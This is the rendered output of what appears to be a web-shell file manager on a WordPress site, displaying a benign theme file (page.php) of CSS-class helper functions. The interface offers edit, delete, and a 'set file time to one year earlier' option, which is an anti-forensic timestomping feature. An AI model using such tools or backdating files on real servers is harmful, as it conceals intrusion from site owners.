文件操作 - page.php
返回文件管理
返回主菜单
删除本文件
文件: /storage/v12552/jimbrandstatter/public_html/wp-content/themes/Total/inc/functions/frontend/page.php
编辑文件内容
<?php defined( 'ABSPATH' ) || exit; /** * Page content class. * * @since 5.0 */ function wpex_page_single_content_class() { $class = array( 'single-page-content', 'single-content', 'entry', 'wpex-clr', ); /** * Filters the single page content class. * * @param array $class */ $class = (array) apply_filters( 'wpex_page_single_content_class', $class ); if ( $class ) { echo 'class="' . esc_attr( implode( ' ', array_unique( $class ) ) ) . '"'; } } /** * Get Page single supported media types. * * @since 5.0 */ function wpex_page_single_supported_media() { $supported_media = array( 'video', 'audio', 'thumbnail', ); /** * Filters the supported media for the standard page media block. * * @param array $supported_media */ $supported_media = (array) apply_filters( 'wpex_page_single_supported_media', $supported_media ); return $supported_media; } /** * Get Post type single format. * * @since 5.0 */ function wpex_page_single_media_type() { $supported_media = wpex_page_single_supported_media(); if ( in_array( 'video', $supported_media ) && wpex_has_post_video() ) { $type = 'video'; } elseif ( in_array( 'audio', $supported_media ) && wpex_has_post_audio() ) { $type = 'audio'; } elseif ( in_array( 'gallery', $supported_media ) && wpex_has_post_gallery() ) { $type = 'gallery'; } elseif ( in_array( 'thumbnail', $supported_media ) && has_post_thumbnail() ) { $type = 'thumbnail'; } else { $type = ''; //important } /** * Filters the single page media type. * * @param array $class */ $type = (string) apply_filters( 'wpex_page_single_media_type', $type ); return $type; } /** * Page single media class. * * @since 5.0 */ function wpex_page_single_media_class() { $class = array( 'single-media', 'wpex-relative', 'wpex-mb-30', ); /** * Filters the single page media class. * * @param array $class */ $class = (array) apply_filters( 'wpex_page_single_media_class', $class ); if ( $class ) { echo 'class="' . esc_attr( implode( ' ', $class ) ) . '"'; } } /** * Page single header class. * * @since 5.0 */ function wpex_page_single_header_class() { $class = array( 'single-page-header', ); if ( 'full-screen' === wpex_content_area_layout() ) { $class[] = 'container'; } /** * Filters the single page header class. * * @param array $class */ $class = (array) apply_filters( 'wpex_page_single_header_class', $class ); if ( $class ) { echo 'class="' . esc_attr( implode( ' ', $class ) ) . '"'; } } /** * Page single title class. * * @since 5.0 */ function wpex_page_single_title_class() { $class = array( 'single-page-title', 'entry-title', 'wpex-text-3xl', 'wpex-mb-20', ); /** * Filters the single page title class. * * @param array $class */ $class = (array) apply_filters( 'wpex_page_single_title_class', $class ); if ( $class ) { echo 'class="' . esc_attr( implode( ' ', $class ) ) . '"'; } }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件